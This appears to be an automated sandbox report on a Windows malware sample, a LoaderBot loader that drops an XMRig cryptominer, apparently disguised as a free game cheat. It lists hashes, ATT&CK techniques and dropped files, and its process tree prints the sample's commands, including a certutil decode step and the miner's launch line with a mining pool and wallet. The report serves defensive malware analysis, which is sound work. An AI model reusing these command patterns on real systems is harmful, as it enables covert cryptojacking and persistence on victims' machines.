Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-05-2024 19:38

General

  • Target

    4cbc50b0f7d5bd24c6f9ab3139af9e39_JaffaCakes118.exe

  • Size

    14.3MB

  • MD5

    4cbc50b0f7d5bd24c6f9ab3139af9e39

  • SHA1

    53d1fd3d74c547cfe5af27dc887783cc4b21339b

  • SHA256

    619af4a455d2f08be2d92d5d59fbd3737278b8746a6162d995be1263eea9add2

  • SHA512

    915f5d0073bf853786ae55535e3f4e1df168c2cb9ab8df4e3f7691fbfbb5831fb0edd21eef5442389117292fa982001454a54fb8e4b95c89df160ea0067078ea

  • SSDEEP

    393216:uSgdVRLcqFuq7Oy0o2ZYcfQZgHO5FU+2JNFOwNreA6F915:uFDRLkg0o267GS2JnO0rfq9f

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 1 IoCs
  • XMRig Miner payload 12 IoCs
  • Manipulates Digital Signatures 1 TTPs 3 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4cbc50b0f7d5bd24c6f9ab3139af9e39_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4cbc50b0f7d5bd24c6f9ab3139af9e39_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4084
    • C:\Users\Admin\AppData\Roaming\1337\Alexandr.exe
      "C:\Users\Admin\AppData\Roaming\1337\Alexandr.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c echo pUVyOKPt
        3⤵
          PID:5028
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Roaming\Sysfiles & cmd < XuGJAWtEjFqgoZUl.com
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3336
          • C:\Windows\SysWOW64\cmd.exe
            cmd
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2668
            • C:\Windows\SysWOW64\PING.EXE
              ping -n 1 moLu.nnnbID
              5⤵
              • Runs ping.exe
              PID:4208
            • C:\Windows\SysWOW64\certutil.exe
              certutil -decode qTh.com y
              5⤵
              • Manipulates Digital Signatures
              PID:2064
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              csrss.com y
              5⤵
              • Executes dropped EXE
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:4528
              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com y
                6⤵
                • Drops startup file
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:4400
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  7⤵
                  • Checks computer location settings
                  • Drops startup file
                  • Adds Run key to start application
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3860
                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQqTgX5TEtWmQ8ZmVZ7 -p x -k -v=0 --donate-level=1 -t 4
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4312
            • C:\Windows\SysWOW64\PING.EXE
              ping 127.0.0.1 -n 30
              5⤵
              • Runs ping.exe
              PID:644
      • C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][17.08.2020].exe
        "C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][17.08.2020].exe"
        2⤵
        • Executes dropped EXE
        PID:3936

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Subvert Trust Controls

    1
    T1553

    SIP and Trust Provider Hijacking

    1
    T1553.003

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Remote System Discovery

    1
    T1018

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\EWSiFeMZzkUETFRYRVL.com
      Filesize

      921KB

      MD5

      c317736793ef5129f12a3568cd679422

      SHA1

      e68b55969c5f2159c847a629fac3731c0c315d53

      SHA256

      cbb5d906c63cbcb891b35e53156b643ac26c5dec922f43b2fd121ccca60beb62

      SHA512

      69cb5fd5f1a30c3c786ca945b8de6a460d03605fc3416a3c33e69691603e1a43ad0cfefe9cd5d6af1a154b701ecf34526cc05d9235a4e38acf994eb0edb1a82c

    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\XuGJAWtEjFqgoZUl.com
      Filesize

      398B

      MD5

      0047726ce0f38e02fda2068d7ff7ceff

      SHA1

      0702fd3e290b95b70b5fc3b70cdb57c808baceb7

      SHA256

      0423e080422306752ccf52e4639a8f6e58596176e730d10bd812012ccf4f296b

      SHA512

      00b525c341b3297e3b011065b32bab9d29eee920e7faebea93e4fcc4fef69b166c11c10291cc9ba9b931551eca3dc9ddae27b681c4d4423478ea3a65d29c7d83

    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ZcaqngYeMJ.com
      Filesize

      2.3MB

      MD5

      09cc8b02108c2ca6db6197e37b165a65

      SHA1

      9f245c5206ce171cfc288ed8bf05896d1b36a1f0

      SHA256

      89ad1822d2ee2d5e39d2e4aae2016562244f7ea43071c192e8989a3c2544d998

      SHA512

      d50c20b554dd85996f8b7432fb3d3668c3fbfcd77314a4adc476861373a0350b122be61ab1aa087153e45c48cf6a453d0829ccfa4786cf679ee3dccb7cffadae

    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
      Filesize

      921KB

      MD5

      8ed172328f643375ac09b31ffba0eb63

      SHA1

      c6716e5e5a311f597e37c5660b0387ab8f77b2a0

      SHA256

      23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928

      SHA512

      79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938

    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\qTh.com
      Filesize

      1.1MB

      MD5

      13a508782d30a527e997a64996920287

      SHA1

      4628a103700d13b6f3920b3a8a06e9757bf0a9eb

      SHA256

      e06ad6278f8cdccb51ed58aee3d6ba97bd770b2d8b827746e539770fc959354e

      SHA512

      cd860c7c8eea0faf0e62f1e695f60c02050c284617265f3e9c11dac4e4cbea34cb656719ae6bdeb39a36dd1446bb443cbcf9c9f4a595c1749f9088d7c082d142

    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\y
      Filesize

      842KB

      MD5

      dbcc4336d132df084c59bbddff9693f5

      SHA1

      172d404379f6d288db4eacaa11bf0fa1ccffa451

      SHA256

      ea3b51ae7fb4264cd4aca28f02fa027bb25ce69a9ece5ff1f9f581b1ae62c84e

      SHA512

      d7209e47c9ef7e8f0db4bc736828e79d745415dde0dbaa7b4d5a21d6ee3406b139f3565cdcae16911c330d3ebbe1bcbe77f5e40d2313909a3b7b58697d3d4e34

    • C:\Users\Admin\AppData\Local\Temp\nsf3A1D.tmp\System.dll
      Filesize

      11KB

      MD5

      2ae993a2ffec0c137eb51c8832691bcb

      SHA1

      98e0b37b7c14890f8a599f35678af5e9435906e1

      SHA256

      681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

      SHA512

      2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

    • C:\Users\Admin\AppData\Roaming\1337\Alexandr.exe
      Filesize

      3.1MB

      MD5

      7afcb8667f1ec33f0cc084936a8a4044

      SHA1

      a2755123f3515fbfcbd5b1ab38c22fa757b8afa8

      SHA256

      2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71

      SHA512

      bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8

    • C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][17.08.2020].exe
      Filesize

      11.3MB

      MD5

      74541b23f5f5c2d86616bea5497db51f

      SHA1

      34d9f8cfbbe0999dd016e32ac4015cbcd127fbdc

      SHA256

      20b6d5a91f896f10a868a95adf50c1710c6a44d841a565bd15ec64fad809449c

      SHA512

      8289d9fba78a9143b8baabde22a083ab1384ff03c36791f80cdd7fac056bcec0ecfd46a7264492b4fce25ba1d2d90784619a1da0f72cb1e759dab806b3286d13

    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      Filesize

      3.9MB

      MD5

      02569a7a91a71133d4a1023bf32aa6f4

      SHA1

      0f16bcb3f3f085d3d3be912195558e9f9680d574

      SHA256

      8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

      SHA512

      534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

    • memory/3860-57-0x0000000016DA0000-0x000000001719A000-memory.dmp
      Filesize

      4.0MB

    • memory/3860-64-0x00000000172A0000-0x0000000017306000-memory.dmp
      Filesize

      408KB

    • memory/3860-54-0x0000000012330000-0x0000000012584000-memory.dmp
      Filesize

      2.3MB

    • memory/4312-80-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-82-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-77-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-78-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-79-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-74-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-81-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-76-0x0000000000440000-0x0000000000454000-memory.dmp
      Filesize

      80KB

    • memory/4312-83-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-84-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-85-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-86-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-87-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB

    • memory/4312-88-0x0000000140000000-0x0000000140B75000-memory.dmp
      Filesize

      11.5MB